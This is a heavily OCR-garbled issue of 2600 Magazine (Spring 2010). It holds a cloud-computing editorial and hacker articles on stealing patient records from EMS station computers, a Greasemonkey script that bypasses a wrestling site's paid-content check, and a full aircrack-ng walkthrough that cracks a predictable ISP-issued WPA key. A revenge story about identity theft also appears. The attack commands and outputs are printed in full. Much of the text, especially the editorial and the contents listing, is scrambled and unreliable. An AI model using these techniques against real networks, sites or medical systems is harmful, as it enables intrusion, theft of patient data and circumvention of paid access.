Cloudy Skies

Pla ns

]!251521140505 04011209060b'


Insecurities in Emergency Res< AJAX Hacking for the Discerning Pro Wrestling Fanatic
IttM f&ar i ! I I »


Big Pond The Grey Hat Manifesto TELECOM I N F O R M E R No Sale for You! rity Through Obscurity BartPE: A P •rtable-iiicrosoftj Windows Influential |\ngles HACKER PERSPECTIVE: Bill from R N O C The Hacker Enigma: Positives, Negatives and W h o Knows? An Introduction to CSRF Attacks The Voyager Library Information System I'

13 15

19 21

29 30 32 33 "Print Me?" Why, Thank 34 46 47 50 51 52 54 59 61 62


My First Hack



Dr. Jekyll and Mr. Pay Pass


] Writing FSrnall Port Checker in C in 40 Lines (or Less) Procurve Switch Hacking Bluetooth Hacking Primer HACKER H A P P E N I N G S MARKETPLACE MEETINGS TRANSMISSIONS Simple How-to on Wireless and Windows Cracking, Part


These m o r e reliability. obtain technically adept. the data center w a s more stable a n d economusing a centralized third party b e c a m e more a w a y from the individual users. a n d learning a great deal in the process. e v e n though this may have first place. speed. getting their own issues w h e n you c o u l d park it remotely and b e reachable? W h y d o i n g their o w n your o w n mail server w h e n C m a i l c a n do it more efficiently and with great amounts of operate Page 4 2600 Magazine ' . In a way. But in order to a v o i d losing our heads in this cloud. they're e v e n a N o w let's e x a m i n e the c o n c e p t of " c l o u d frequency phrase we as our will hear connected with technology n e e d e d to e v o l v e to the degree where just about anybody could get the inclination for this. y o u m o v e d up formation as capacity." continuing planet to set them up or k n o w precisely h o w they your h o m e or office. in building a n d upgrading their o w n cars. brought people to central points of contact. still others C h a t servers. People w h o communicated Hotmail w e r e generally not seen as the most solely through a service such as a c o n n e c t i o n of s o m e sort. and decreased costs. S o m e w o u l d set up their o w n services based o n w h a t exactly they w a n t e d UNIX machine. greater storage are c o m m o n . Social networking without e v e n investing in a m a c h i n e through obviously all positive developments. Basically. Obviously. a huge of the hardware. the list w e n t o n a n d on. This results in capacity. not all of us had the time or serious about what's going o n around them. w e ' v e seen a real trans- w a s a sign of status. been the only w a y they c o u l d connect in the shells that others c o u l d login to. Naturally. it w a s equivalent to e v e r y o n e being involved repairs. Internet Relay run websites out of their homes. these t w o worlds existed side by also age of 11 to 85 c o u l d b e expected to get a setting lot of do-it-yourself activity with regards to there w e r e the masses. There w e r e the do-it-yourselfers a n d then derision w a s reserved for those w h o emailed the or c o n n e c t e d to an I R C server through a mass appeal host like A O L . Rather than managing your o w n email. W e b s i t e s c o u l d b e run remotely virtual hosting. house a n d h a v e to deal w i t h h a v e it always Why keep a server connectivity at your In recent years. bit "scatterbrained." a they have no sense of reality. ease of use. If y o u w e r e a b l e to get a f e w pegs in the eyes of your peers. s o m e might w o u l d run Usenet n e w s feeds. Instead of running a server out of c l o u d is w h a t the Internet has b e c o m e . So it w a s inevitable that computing. S p e e d faster service to your location. Initially. It means they're not particularly in the clouds. a degree of side. w e need to look at a n d prepare for the risks In the early days of the net." it's generally not seen as a W h e n w e say s o m e o n e has their " h e a d equipment.c o m p l i m e n t . software. a n d install various to do. Anyone from w h i c h obviously m a d e them more effective. a n d functionality of c l o u d c o m p u t i n g have all improved dramatically. using the services of a ical. a n d responsibility network of shared resources that moves m u c h continues to evolve. there w a s a up connectivity. services they w a n t e d without actually having worked. set up a n operating system. attached to it.

it may b e n o n e of their d a m n business (forbidding " i m m o r a l " v i d e o games). O r something y o u bought electronically c a n b e "taken b a c k " without e v e n letting y o u know. oftentimes without an argument because of the c o n v e n i e n c e factor. as w e have mentioned in these pages before. Just as w e w o u l d advise p e o p l e to a l w a y s m a k e backups of any data they possess. It's likely you are n o w forced to use hardware that technically doesn't belong to y o u (such as a c a b l e m o d e m ) and w h i c h y o u can't fully access even though you have possession of it. But e v e n if y o u don't have the need to b e completely independent of the c l o u d and the prospect of your data residing under s o m e o n e else's roof doesn't disturb you. Last year. you w o n ' t b e the first to k n o w w h e n some entity serves notice to shut it d o w n for o n e reason or another. and not be forced to have a monopolistic p h o n e or c a b l e c o m p a n y as your provider. You may just find yourself cut off. this simply isn't thought through and all kinds of embarrassing things w i n d up happening as a result. W e need to b e clear. Apart from the control a n d security issues. quicker. then y o u h a v e a degree of autonomy that seems to be vanishing for many of us. W h i l e it's a trivial issue to get around many of these restrictions for those w h o are so motivated and w h o have the skills. y o u can't really control what's not in your possession. a n d repairs and maintenance start taking their find ourselves increasingly at the w h i m of giant companies. the titles in question w e r e G e o r g e O r w e l l ' s Animal Farm a n d 1984. w e ' v e more professional. A m a z o n did just this to customers w h o had purchased electronic books o n its Kindle service w h e n they ran into a legal issue w i t h the books' distribution. Easier. Remember. So what are the risks in this? Mostly. w e must stress the importance of d o i n g the same thing w i t h data entrusted to outside companies.when everyone free storage? W h y run your o w n chat system is on Facebook a n d Twitter? slowly seen those people w h o w e r e doing their o w n To continue the car analogy. In order to really benefit from w h a t c l o u d c o m p u t i n g c a n do. Emerging smart phones c a n be forbidden from running software that either the manufacturer or p h o n e c o m p a n y doesn't a p p r o v e of. It's still possible a n d easy to use the net as individuals. In fact. it's vitally important that y o u at least b e prepared in the event of s o m e sort of a disruption or failure. cloud computing makes s o m e o n e more of a consumer than a developer by default. the fact is that they have legal possession of your email o n their servers. Even after yielding this much. Running your o w n website is forbidden on most c a b l e m o d e m connections and n e w e r FIOS setups routinely block port 80. w e may cars to the dealer instead. Their reasoning may m a k e sense (security issues). In more serious cases. the authorities c a n grab your stuff with a mere subpoena to the company. Spring 2010 • Page 5 • . rather than having to get a search warrant a n d c o m e visit your house. • W h e n you have your website in s o m e o n e else's colocation facility. M a n y times. legal problems). it's a lack of control. Every technological a d v a n c e carries w i t h it certain advantages a n d potential regressions. playing by their rules. W h a t ' s disappearing is the ease w i t h w h i c h w e c a n d o this w h i l e not being s o m e h o w under a m u c h larger entity's w i n g . since o n e person's poor security habits c a n put everyone at risk. Just b e c a u s e they are big a n d professional. • If something bad happens to o n e of these companies that y o u ' v e entrusted with your online presence (bankruptcies. more so than ever before. most people w i l l wind up paying o n e of the giant providers. W e c a n b e creative a n d reach the entire w o r l d . • The c l o u d makes it easier for people to collaborate on projects by sharing documents online. nor that it's particularly high o n their priority list. there's no reason to believe that they w i l l be a b l e to safeguard what's important to you. or it may b e for completely selfish reasons ( A p p l e not a l l o w i n g a G o o g l e V o i c e a p p to b e installed o n their iPhones). y o u c a n find yourself adversely affected by someone else's drama. In a n almost too perfect irony. If y o u c a n run your o w n network internally. w e need to a n a l y z e its uses a n d abuses w i t h our feet firmly o n the ground. fires. There are numerous other such examples that all point to the same conclusion: consumers run the risk of b e c o m i n g almost irrelevant if they simply coast along a n d accept it all w i t h o u t question. a n d giving up control. keep your email off of any m a c h i n e y o u don't have physical access to. the words in your email are scanned so that you c a n receive advertising that may be relevant to your interests. H e r e are some examples: • W h i l e G m a i l certainly does a better j o b of sending a n d receiving mail than most of us setting up a Linux box over a copper connection. But such web-based applications also make it easier for outsiders to gain full access to these projects.

A n d thanks to its popularity. it is a very c o m m o n application for storing information to tables in a database. I turned on the T V and saw a news report about a $10 million ransom for stolen medical records. 576/60=9. you don't have to try every possible combination.by Metalxl 000 Just yesterday. E M S 2000 is an application that was designed using Micro$oft Access. So. D u e to the sensitive nature of people's personal information. plus a tt key and a * key. I w a s having a conversation with my friend at work over the security of medical records. whether it be a fire depart- ment or EMS. has multiple stations and multiple computers for doing reports. That means you can only try three combinations per minute. Instead of one through five. Even if the lock used a five digit combination. N o w if w e used digital locks. They also lock down for a minute or so if you enter the combination incorrectly three times. If there is more than one patient. But. due to the fact that w e have two software applications being used to fill out reports. In most cases there are multiple medical reports created and submitted for each call. Today. currently. quick math again. w o u l d notice the same things I have. Now. Anyone with a little knowledge of computers. A n d that is the scary part. Each one of these computers stores the data on its hard drive. This means that anyone w h o has physical access to one of these computers has access to all the patient information that has ever been entered." a c o m m o n program used by many departments. It's even longer for transport units that have to go all the way to the hospital. there is more than one report. That is. And. A short call for us is about 20 minutes. I have patients on most of the calls I go on. So. whether it be hardware or software. And. A report must be done for each patient. you could try ten a minute. let's have a look at where it's stored. That brings up the question. It's worked on all the ones I've tried. H e broke in and stole nearly 8. it would only take 12 minutes to go through every combination. but not 445. so quick math tells us then that there are only 60 possible combinations. They are mechanical locks w h i c h only allow each button to be used once. The information is stored in a sub-folder of the E M S 2000 program itself. You could try every possible combination in 9. there are a number of tools out there to v i e w and manipulate the information in a Micro$oft Database ( M D B ) file. " H o w hard is it to sit d o w n in front of one of these computers without permission?" The answer: not very hard. N o w that w e know what format the information is in. That means that it would only take six minutes to try every possible combination. W h a t I will be sharing with you is only part of the picture. Each department. As a fire fighter. The locks also have more buttons.6 hours. they have one through ten. I can't really dig around too deep into the subject. If you are familiar with the job of emergency rescue services. 435 could be a combination. Even if you went slowly and took six seconds per combination. If there is more than one department on scene.3 million medical records from a website that tracks prescription drug abuse in Virginia. you know that w e are in and out of the station all day long. So the opportunity is there. my department creates two reports for each patient on each call. don't forget. this would be different. of course. The M D B files are not encrypted or password protected. Although Micro$oft Access is closed and proprietary. the news story focused on the "evil hacker" that did this.6 hours. W h e r e does the information go o n c e the report is written? H o w secure is the transmission of this information? H o w secure are the computers that this information is stored on? W h o has access to this information? I plan on answering as many of these questions as I can with the knowledge I have gathered in my short time with my department. there is going to be a report submitted by each department. let's face it-the guy is a criminal. if you didn't realize that most of the digital locks have a default unlock code of pressing every key starting at one and ending at tt. 12*12*12=1728 possible combinations. M y department has combination locks with five numbered buttons. W h a t I plan to show you is what I have observed in my regular daily routines. But what about locks? Can someone enter a station while no one is there? Some departments leave their doors unlocked. on each call. W e would have the ability to use the same digits more than once in the combination. • Page 6 • 2600 Magazine ' . 1728/3=576 minutes. Three digit combinations seem to be the standard. O n e of my main focuses is going to be on " E M S 2000. You just have to try until you hit the right one.

you are sending information out. O n top of that. It also sends a database with a list of all the employees in the entire county. If you can physically plug into the network. but the thief doesn't need to wait around. N o one is going to spend 3 minutes at the door of a fire station in order to get information that is worth millions of dollars in identity theft or. one can still be in and out in a few seconds. I needed to search through the data to see what I had. grab the M D B file. and walk away. the field of emergency rescue services is not like most offices. " You could plug a computer into this port. phone numbers.^ Spring 2010 You may be thinking. I was amazed to find not only my name. because if you w e r e a firefighter and you came back to the station and found someone inside the first thing you w o u l d think is. but where it goes and how it gets there. Firewalls are great for keeping things out. Let's take a look at not just where the information is stored. but my social security number as well. And. Most of the packets being sent were just binary data. you have to be on the local network to packet scan and grab the information being sent. Computers that anyone can walk up to. This is just a fact of life. It would take a while to scan the w h o l e computer. Just remember. Page . M y name is in the report. Most people w o u l d not have a clue as to w h y the router is there or if it should be there. Every station I work at has W i F i . A program could be written to scan for those files and be executed off of a flash drive or C D . or a wireless router. 30 seconds. If the software is unfamiliar. If one is familiar with the software. There is always going to be some flaw that will allow information to end up where you may not want it to go. H o w else can someone get on the local network at a fire or E M S station? A physical Ethernet jack w i l l do the trick. E M S 2000 uses S Q L to send the information to a server. o n c e he left. you would start yelling at each other. D O C . but I did see some A S C I I text (plain text words). " W h a t about firewalls!" you cry out. But how can this be done? You have to be on the network w h e n the report is submitted. M D B . to capture the data being sent. M y personal information was also being sent across the networks at all these locations. they really suck at keeping things in. there are phones outside by the trucks. the program could transmit the data over the Internet. VoIP phones using a SIP protocol. Yeah. So. and go. The W i F i is supposed to be encrypted. A n d nobody puts Ethernet jacks on the outside of a building. And. E M S 2000 not only sends the information for the report currently being submitted. N o one is going to hide in the closet with their laptop and wait for you to send a report and then run away. but also the entire database of every report ever completed on that computer. w e are using W E P . Because of this. plug a router into the phone. it w a s sending it all in unencrypted plaintext. and XLS files would be a good start. Anyone could walk up. you keep telling yourself that. " N o one is going to do that". You can sit in your car and push buttons. But w h e n a hole is found. " I needed to use the phone and the door was unlocked" and. "I don't believe anyone would do this. Stick the flash drive in. there is no passw o r d required. they also have an Ethernet port labeled " P C . if you can send emails. or even search Google. By the time the thief gets home. H o w hard is this to do? It's easier in some ways than standing at a door for 6 minutes pushing buttons." Right. As I said earlier. what makes you think someone else can't? You're still thinking. so I searched for that. ransom. he will have all the files waiting for him. These phones not only have a CAT-5 network cable plugged into them. it takes someone less than 6 minutes to get in. as we are seeing in recent days. I want to make that clear. Offices use office files. W h e n the capture was completed. There is no such thing as a secure computer. and even email addresses. Especially w h e n there is a legal responsibility to protect patients' confidential information. Drop a C D in and go. " W h o left the door unlocked!" or " S o m e o n e write up an Notice Of Repair on the door!" Let's say you are right and the person is too scared to go in the station. O r do they? Most offices don't have cubicles outside. it should be fixed immediately. w h i c h can be easily broken in about 5 minutes. but half the stations have not been for at least a year. such as social security numbers. more likely. I used ettercap to study the network traffic coming out of and going into the computer as it sent reports to the S Q L server and saw all the information E M S 2000 was sending flashing by on my screen. N o w I know that my personal information is sitting on computers all over the county. in this case EMS 2000. The program could copy the files to one place on the hard drive for later retrieval (since the thief already has the combination to the door). I don't know why. not just mine either. But. H o w long does it then take to get the information off of the computer? Depends on how it's done. If you can do that. Firefighters spend a lot of time in their trucks. So w h y have a network jack outside? W e l l . Along with private information. if the door isn't already open. This w a s just a quick look at a few areas of security that need work. Someone w h o may not know exactly what they are looking for can still guess where the good stuff is. home addresses. "They must be stealing patient information!" The thief could say. Or.

sent unencoded. I saw a stern warning about not sharing my Elite login with anyone. so I wrote up an article for 2600 and submitted it. I had my hack in place and I inadvertently clicked on one of the Elite teaser headlines. This keeps most of the evil stuff at bay. I dare you. PWInsider also has something called an Elite membership.pwinsider. The problem is. So I poked around in the source code for a while. p w i n s i d e r . when I clicked on article links. w h i c h w a s determined based on whether the interstitial ad loaded or not. since I'm not interested in my computer getting herpes or in the general tasering of gnomes. I use Adblock Plus (http://adblockplus.com/ajax/ *»comniands/getarthtml . you w i l l find the seedy. and installed it to see if it worked. as a fan. As I've said. popup-riddled underbelly of the Internet known as pro wrestling websites. they're pretty decent with their news reporting so. About M a y of 2008. or use Adblock. 1 personally have no interest in their podcasts. but I'm not trying to put anyone out of business.pwinsider. If you mix these things together. someone at PWInsider must have heard of Adblock because. the security hole was plugged and the ad-blockblocker was removed. You pay a monthly subscription fee. There w a s also a boolean query variable. so it didn't get published. while eating my breakfast. you either have to w a d e through the flashing mess. Now. I got a message saying "ad-blocking software is not a l l o w e d " in place of the article text. I was a little peeved but. A short while later. more than anything. But I'm not here to talk to you about my surfing habits. </script> <script type="text/javascript" src=" *»include/adframe.php?id= 0024&pn=l&b=false If you pasted that last one into an address bar. Not only did it work. banners. I choose the latter path. But that wasn't the end of the story. com/ViewArticle *». M u c h to my surprise. So. I bashed together a quick 'n' dirty Greasemonkey script to automat- cscript type="text/javascript*> abp = false. no article for you! So this U R L : ically transform the U R L . on a whim. when you click through to find out w h o it is. At the same time. 1 had my hack.write(unescape('[A whole ^ Page 8 ^ Page 8 2600 Magazine ' . Most wrestling sites have never met a banner ad that they didn't like. So. but it o n c e again gave me access to the Elite content! This time. and you're granted access to podcasts and exclusive news. and everyone was happy. I also sent an anonymous email detailing the hack to the guy w h o codes the site. I'm here to talk about the most egregious advertising offender I've ever seen.A J A X H A C K I N G FOR THE DISCERNING PRO WRESTLING FANATIC by Gorgeous_G I am an unrepentant professional wrestling fan. O n e morning.org/) in Firefox. and I was happy. the article will just be an ad for the Elite site.js"> </script> <script language®javascript> ••document. if b=true. b. I was checking my news. in addition to an ad-free site. G o ahead and go to that site in Internet Explorer. the actual checking is being done by this piece of code: http: / /www. Those guys make a living off of their Elite content. I had my doubts about them taking my hack seriously. It is an eye-searing mess of flash. They'll put up a headline like "Former W W E Champion Found D e a d with W i f e and Son" and. Now. and interstitials. clicked through to a link on PWInsider. and was met with another stern admonishment about using ad-blocking software. but the site creators use some dirty tricks to try to entice you to give them your money. I w a s obscenely interested in how the ad-block-block code worked. I am also an unrepentant nerd. and nothing else. c o m ) . PWInsider (http: / / w w w .php?id=40024&p=l was being translated to this A J A X request: http://www. only on the H T M L frontend to get into the Elite site. presto! You got the plain H T M L of the article. I may be a dirty ad-blocking leech as far as the creators of the site are concerned. the hack was useless. By the time the 2600 editors got around to reviewing my article. using part of the U R L of the regular article page. and found that the article text was displayed using an A J A X request. and a set of working links to postgame podcasts! There was no password protection on their paid content whatsoever. I dug through my email archives for my old script.

split('&').location.org/firefox/addon/748).) // ==UserScript== // @name Do Fixer Neo // @description Fix PWInsider's crappiness // @author Gorgeous_G // Sversion 1 // Sinclude http://*. var queryList = url. W i l l 1 warn them about the security hole again? Certainly.js consists of one line: abp = true.11 W i F i connection. The router seemed the best way to go.com/include/adframe. I found myself with a flooded basement and most of my personal belongings and computer equipment destroyed. You'll need Mozilla Firefox (http://www. I cancelled my fixed line and ADSL2+ service and ordered myself a 3 G router. with W P A TKIP PSK offering them at least some form of security and ease of setup. var newurl = ("http://www. I had to find myself a new place to live and way to connect to the Internet. After unpacking. allowing me the flexibility of being able to move to a new place at short notice without the hassle of setting up a new account for a fixed line and A D S L service. Also included in the package was a credit card-sized plastic card with the details for a pre-configured SSID and W P A key for the router's 802.pwinsiderxtra. I found it was a Netcomm 3 G 9 W rebadged for BigPond. once this article published.pwinsider. BigPond. I set the 945GCLF up with a CAT5 connection to the router's four-port switch and. I mulled over the decision of either a U S B 3 G card or a 3 G router.. The only computers I had left after the flood were an Intel 945GCLF Mini-ITX with an Intel A T O M processor and my laptop.. Whitelisting http://www.11 b/g connection and a fourport switch. I was connected to the internet.php?" + splitagain(O) + "&pn=l"). and spits out the warning instead of the article text if the value is false. A quick visit to the website of my telco. The router had an 802.^ bunch of double and triple« escaped JS code.href.com/) and the Creasemonkey extension(https:// ^•addons .. Here is the very ugly code for my article-text-only/inadvertent-Elite-access hack. I also came across a Zydas ZD1211 U S B W i F i card in a box of Page 9 S . omitted for publishing]')</script> And adframe.mozilla.pwinsider. showed a new type of connection available via high speed wireless 3G. The escaped code looks for the value of abp.js is blocked. c o m After some of the heaviest rainfall in my area in 30 years. M y first impression was how thoughtful the telco was to pre-configure the router for a W i F i connection for the less technical-minded of their customers.split('?') .com/* // «/UserScript = = var url = window.com/ajax/commands/ getarthtml. by k a w a r i m o n o @ b i g p o n d . which it will be if adframe.href = newurl.mozilla.js is an ad loader. var splitagain > queryList[1].com/* // Sinclude http://*. I had been connected via an ADSL2+ connection but needed another form of connection while I found a new place to live. So they're trying to fool Adblock into thinking that adframe. js will get around the adblocking.pwinsider. window. after entering my user name and password for the 3 G connection in the w e b interface of the router.location. A few days later a courier arrived with ^ Spring 2010 I the router.

56 Sending 64 directed DeAuth. I set up my laptop to connect to the access point on the router. SSID: BigPond8686 WPA Key: 0903428686 The last four digits of the SSID and W P A key matched! This had to be more than a coincidence and definitely required some further investigation. I headed back to Google and searched for a wordlist generating script.txt". for the first half of the key. STMAC: [00:IE:2A:F1:4E: D2] : [441214 ACKs] D2] 17: 46:.11 functionality of the router. ^FileSystemObject*) Set objlnFile = objFSO. I now needed to append the known four digits 8686 to the end of each line in this file. I found one written in Perl called wg.Close objOutFile. Not being familiar with Ruby I searched for the original Perl script and found it here: http://digilander. Const ForReading = 1 Const ForWriting = 2 Set objFSO = CreateObject("Scripting.[phyO] (monitor mode enabled on monO) I also tested that the packet capture was functioning by running airodump-ng: root@bt:~# airodump-ng wlanO CH 3 ][ Elapsed: 3 mins ][ 2009-06-04 17:39 BSSID PWR Beacons *Data.txt in the Backtrack 4 directory. STMAC: [00:IE:2A:F1:4E: D2] : [421190 ACKs] 17. : 00 Sending 64 directed DeAuth.WriteLine strContents Loop objlnFile. I knocked up a quick VBScript to perform this.pl. I knew what the last four digits would be. so I only needed to generate a list of every combination of a six digit string. something caught my eye. STMAC: [00:IE:2A:F1:4E: D2 ] [501214 ACKs] 10 2600 Magazine ' . I opened another terminal window and forced the laptop to re-authenticate by injecting de-authentication packets: root@bt:~# aireplay-ng -0 5 -a 00:1A:2B:3E:5C:7B -c 17.58 Sending 64 directed DeAuth. STMAC: [ 00:IE:2A:F1:4E: : •• [521207 ACKs] 17. 46::59 Sending 64 directed DeAuth.OpenTextFileCC: ••\BT4\wordlist. 46::55 Waiting for beacon frame (BSSID: 00 :1A:2B:3E:5C:7B) on channel 11 : 17: 46:. connected the Zydas W i F i card to my Windows 7 workstation. so I downloaded the latest Active State Perl distribution and installed it.libero.57 Sending 64 directed DeAuth. O n c e Backtrack had successfully booted.txt".parts that was not damaged in the flooding and decided to try out the 802.AtEndOfStream strLine = objlnFile. #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:3E:5C:7B 78 254 120 2 11 54 WPA TRIP PSK BigPond8686 BSSID STATION PWR Rate Lost Packets Probe 00 : 1A: 2B: 3E: 5C: 7B 00 : IE : 2A: F1: 4E: D2 30 18-18 0 99 I then needed to start capturing packets between my laptop and the router. I had played around with cracking W E P keys using a Backtrack live C D and wondered how easy it would be to crack a W P A key if 1 knew the last four digits in the key. and not being a fan of reinventing the wheel. I then generated every combination of a six root@bt:~# airmon-ng start wlanO Interface Chipset Driver digit string and sent the output to the Backtrack 4 directory I had on my W i n d o w s drive: C:\>perl C:\Perl\wg. STMAC: [00:IE:2A:F1:4E: D2] : [411195 ACKs] 17. A quick search on Google turned up several sites detailing how to use aircrack-ng to crack a W P A key. Looking at the card the telco had provided. after first creating a blank file WPAKey.OpenTextFile(" ••C:\BT4\WPAKey. to capture the W P A authentication handshake. Being the lazy type.pl -1 6 -u 6 -v 0123456789 > C:\BT4\ ••wordlist. txt This gave me a text file with a list of every possible 6 digit combination from 000000 to 999999.Close I now had a wordlist I could pass to aircrackng for cracking the W P A key. I ran airmon-ng to set the W i F i card into monitor mode: V ^ Page wlanO ZyDAS 1211 zdl211rw . using airodump-ng. 47:. 46:.ReadLine strContents = strLine & "8686" objOutFile. ForReading) Set objOutFile = objFSO. and rebooted into the Backtrack 4 live CD. This script is no longer maintained and has now been ported to Ruby by the author. showing that you needed to generate a wordlist to feed into aircrack-ng after capturing the initial authentication handshake.it/reda/ ••downloads/perl/wg. ForWriting) Do Until objlnFile.pi I have been using W i n d o w s 7 RC1 as my primary O S since release.

com/ *»site/clickdeathsquad/Home/ *»cds-wpacrack The 600-page hardcover collection can be found at bookstores everywhere and at http: //amazon .' root@bt:~# airodump-ng -c 11 --bssid 00 : 1A: 2B: 3E: 5C : 7B -w psk wlanO CH 11 ][ Elapsed: 5 mins ][ 2009-06-04 17:48 ][ WPA handshake: 00:1A:2B:3E:5C:7B BSSID PWR RXQ Beacons #Data. 2-Wire. This shows that encryption can easily be broken if the method of generating and distributing the keys is flawed.com.au/ data/ '•assets/file/0009/52299/3G9W_ *»User_Guide. especially considering the Intel A T O M is not the most powerful of processors.com/2600 The special "collector's edition " is also available in rapidly dwindling numbers.remote-exploit. ^Spring 2010 Page 11 . pdf • Backtrack 4 Beta: http://www. • Details of Router: DO D3 64 6C BA F6 50 6D 07 74 AC B0 9A 5D F2 55 B3 39 92 A9 EA http://www. but the SSID's last four digits did not correspond to the last four digits of the W P A key. I rang a friend I knew who also had a BigPond-supplied router from another manufacturer.html • Perl W o r d Generator Script: http://digilander.google.com. I ran airodump-ng to capture the W P A handshake and output it to a capture file for cracking with aircrack-ng: After capturing the W P A handshake. but the key was still not randomly generated.J The Best of 2600: A Hacker Odyssey . but it was able to crack the key in less than 6 minutes. At least.org/ *»backtrack_download.au/ *»products/3g/3g9wb • M a n u a l for Router: http://netcomm. in another terminal window. I set out to crack they key using aircrack-ng and the wordlist I had previously generated: root@bt:~# aircrack-ng -w /mnt/sda2/BT4/WPAKey.pi • aircrack-ng against W P A : http://sites. they had used the first four digits of the devices serial number for the last four digits of the W P A key.0 rc2 rl385 [00:05:48] 90344 keys tested (262. the digits weren't broadcast for all to see. #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:3E:5C:7B 78 100 3220 3084 7 11 54 WPA TRIP PSK BigPond8686 BSSID STATION PWR Rate Lost Packets Probe 00:1A:2B:3E:5C:7B 00:IE:2A:F1:4E:D2 30 11.it/ reda/downloads/perl/wg.66 k/s) KEY FOUND! [ 0903428686 ] Master Key : 5B E2 4B BC F0 0E CC 17 BE 76 30 19 CF AE 9D 25 D5 55 99 C2 30 D9 5B 5E 54 04 Transient Key : CF 11 D9 4A 36 52 4E DC AA B3 F5 C4 8F CC FC 64 44 7D 8E EA 42 D2 2C 91 CI 60 31 18 47 31 43 96 54 37 EA 64 9E 26 2F 72 22 C8 EA E4 D4 4D E6 B1 6C 20 3F 3C EAPOL HMAC : 6C E2 A9 DE 49 5B 41 88 8B 02 El 40 F1 I had expected this to take some time. to see if he had a similar card with his router's S S I D and W P A key. H e also had been supplied with a card.netcomm.9 0 3278 »C dumping to kismet csv file At the same time. as was the case with the SSID on my router.cap Aircrack-ng 1. For his router.libero. for him. txt -b 00:1A:2B:3E:5C:7B psk*.

I'm just sorry I couldn't change his mind. Every time you saw me. It sure is nice to make your own hours! O h yeah. and the one you made fun of a lot? That was me. you didn't show up to class a whole lot. bad credit or something? I'll try and talk to her about it. Do you remember? To be fair. Take care/comb your hair. can I get your mother's maiden name? I need it for something. can they? Everything is going great here! I just wanted to catch up with you. *-=:%[KNoWLeDGE iS tHE aNSWeR: BaN FiReaRMS]%:=-* Greetinx to Toxic Zombies "Keeng for the intro z'Almighty V ^ Page line and my boy Tusk 12 2600 Magazine ' . You know. that kid! I got really good grades. alone. The one who spent all his spare time reading a lot. "live and learn. Yeah. but I actually prefer my 486. okay? I also heard your ex-wife found love elsewhere. It HflT RULFLRUWESTD brings back a lot of good memories. box for you the other day.RisinG. but you got held back. I have a lot of free time. a bookworm and some other not-so-nice things." so they say! A realtor friend of mine told me she had to deny you a mortgage loan! Something about the wrong forms of identification. Yeah. though. since I work from home. I tried to talk the boss out of it. Man. You kicked me on the ground as you walked by. I'm not sure if you remember me.O. then turned in the correct copy. O h yeah. that sure was a long time ago! Well. I'm still into computers. I'm the one you poked fun at a lot in the hallways. I'm the one you laughed at when somebody tripped me. Don't you remember me? I'm the one who was really into computers. but you may want to.GrouP Hey you. I covered my head. I understand you lost your job the other day. a geek. you called me a nerd. That was a good one! Boy. I'm amazed she learned about you meeting somebody else while you two were still together! She told me the whole story. people just can't keep anything a secret anymore. I definitely never forgot about you. You probably shouldn't have thrown that stuff out with your social security number still printed on it.THE & R W by D a N e w MentOr of PhoeniX. you. I'm that kid whose lunch you swiped. Oh. you should probably make it a habit to lock your patio door more often. Remember that? M y mom had to buy me a new shirt. though. You have to admit you had the worst schedule. Oh. Well. remember that time you snatched my homework and copied all the answers before class? I knew you would do that! That's the reason I wrote all the wrong stuff down the night before. I actually bought a new one with your daughter's college fund. since that one was ripped. I'm not sure if you've checked your credit lately. as he's a very good friend of mine. That kid. I didn't think you'd mind. the one you were saving up for? Thanks! It's a super fast machine. I sat at that one table. You threw your food at me in the lunchroom and laughed. and you thought it was pretty funny. Remember? The one whose backpack you stole. I'll get it from you. I checked your P. I drive by your apartment sometimes when I'm bored.

reselling service on both C D M A and G S M networks. even to Canada. M a y b e both.Hello. Next. though. and asked if I wanted to opt in for telemarketing and S M S ads (I declined). They only work on Tracfone-branded handsets loaded with Tracfone "airtime tank" firmware. A few months ago. It came handset. either. Calls to the Commonwealth of the Northern Mariana Islands and G u a m are blocked. a vehicle would roll into our parking lot. and it made for interesting "service monitoring. I was interested to service. and then the driver did the unthinkable: he burned a donut in my parking lot! W e l l . you may receive a " P 5 " S I M card. This was better than the 365 days and 200 minutes promised on the package. and a cup of tea on my desk. it became one of the busiest coin stations in the city.and my young acquaintance moved his business to the minimart across the street. A few minutes later. the site asked for personal information (which isn't validated . Instead. folks. I was instructed to power cycle the handset. when a white Camaro pulled into my parking lot at high speed. the telecommunications provider to the underworld. I chose to have a new number issued. skid marks. my long-neglected coin station had new signage: " O U T G O I N G CALLS O N L Y " . If you have bad credit. most interestingly in the dial plan. You can then either port in an existing cellular number or have a new one issued. Tracfone does not appear to block calls to high access charge areas. it's cold and flu season. though ." For months. S I M cards are specialized. After all. It's an old Western Electric 1D2 set. incoming calls generate revenue for the company. Tracfone asked for the IMEI of the handset.the company is paying a perfect attendance bonus this month. including a home phone number. To start the process. It doesn't matter. Non-Tracfone S I M cards cannot be used on Tracfone handsets. that was it. and I have one or the other of them. and was designated to AT&T (a " P 4 " type SIM). and then the young entrepreneur would return to his "office. phones are sold w e l l below cost and the revenue is made up through airtime sales. he'd step inside to do business. N o credit checks or identification is required. 200 airtime Page 13^ .you can enter anything). and it was configured to allow incoming calls until last week. this didn't bother me. At that." All of that changed last week.. Tracfone has spent a considerable amount of effort to prevent their handsets from being unlocked. Tracfone requested the Z I P code where I planned to use my phone the most. although calls are permitted to Puerto Rico and the U. it operates as a M o b i l e Virtual Network Operator. Tracfone doesn't actually operate a network in the United States. one year of minutes. His new "office number" became a Tracfone. so I purchased $70 at Walmart.. issued by AT&T Mobility. International calls can't be direct dialed from the handset. The next morning.S. w e have a coin station. Utah Spring 2010 learn more about this a starter kit for about with a SamsungT301G service. Virgin Islands. It was automatically programmed over the air and loaded with 210 minutes. O n c e you insert a S I M card for the first time into a Tracfone. Better yet. The firmware of the handset is also locked down. and I was able to complete a call to a chat line in Garrison. and greetings from the Central Office! I'm bundled up. Depending upon the market. and the stench of burnt rubber hung in the air. w h i c h was easy and straightforward. the owner of the dominant Mexican wireline and wireless providers. and all I need to do is make it through at least half of my shift! Outside my Central Office. A shadylooking teenager would hang out all night on Friday and Saturday taking lots of very short incoming calls. the business activities never caused me any trouble. run a not-quite-legal business. both wall and car chargers. Yes. I set it up online. This is primarily because of the heavily subsidized nature of their handsets. it's forever married to that phone and cannot be used on any other phone. or M V N O . have an electric heater at my feet. You can set up the handset either online or over the phone. with an expiration date 425 days in the future. or are an illegal immigrant. and a carrying case. Tracfone is designed for you. Some domestic calls are also blocked even though "Nationw i d e Long Distance" is promised. the service is totally anonymous and can be paid for with cash! O w n e d by 